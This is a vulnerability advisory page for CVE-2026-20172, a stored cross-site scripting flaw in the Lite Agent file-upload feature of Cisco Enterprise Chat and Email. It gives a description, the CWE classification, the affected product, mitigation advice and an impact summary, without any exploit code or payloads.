CVE-2026-20172
Received Received - Intake
Stored XSS in Cisco Enterprise Chat and Email Lite Agent

Publication date: 2026-05-06

Last updated on: 2026-05-06

Assigner: Cisco Systems, Inc.

Description
A vulnerability in the Lite Agent feature of Cisco Enterprise Chat and Email (ECE) could allow an authenticated, remote attacker to conduct browser-based attacks. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Agent. This vulnerability is due to inadequate validation of file contents during file upload operations. An attacker could exploit this vulnerability by uploading a file that contains malicious scripts or HTML code, which the application could make available to other users to access. A successful exploit could allow the attacker to execute the contents of that file in the browser of a user and conduct browser-based attacks. 
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-05-06
Last Modified
2026-05-06
Generated
2026-06-16
AI Q&A
2026-05-06
EPSS Evaluated
2026-06-15
NVD
CVE-2026-20172
EUVD
EUVD-2026-27856
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
cisco enterprise_chat_and_email *
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-646 The product allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Mitigation Strategies

To mitigate this vulnerability, ensure that only trusted users with valid credentials and appropriate roles (at least Agent role) can upload files. Implement strict validation and sanitization of file contents during upload operations to prevent malicious scripts or HTML code from being accepted. Additionally, monitor and restrict file upload functionality to reduce the risk of exploitation.

Executive Summary

This vulnerability exists in the Lite Agent feature of Cisco Enterprise Chat and Email (ECE). It allows an authenticated remote attacker, who has valid user credentials with at least the Agent role, to perform browser-based attacks.

The root cause is inadequate validation of file contents during file upload operations. An attacker can upload a file containing malicious scripts or HTML code. When this file is accessed by other users, the malicious content can be executed in their browsers, enabling the attacker to conduct browser-based attacks.

Impact Analysis

If exploited, this vulnerability could allow an attacker to execute malicious scripts in the browsers of users who access the uploaded files. This could lead to unauthorized actions performed on behalf of users, potentially compromising user sessions or data integrity.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-20172. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart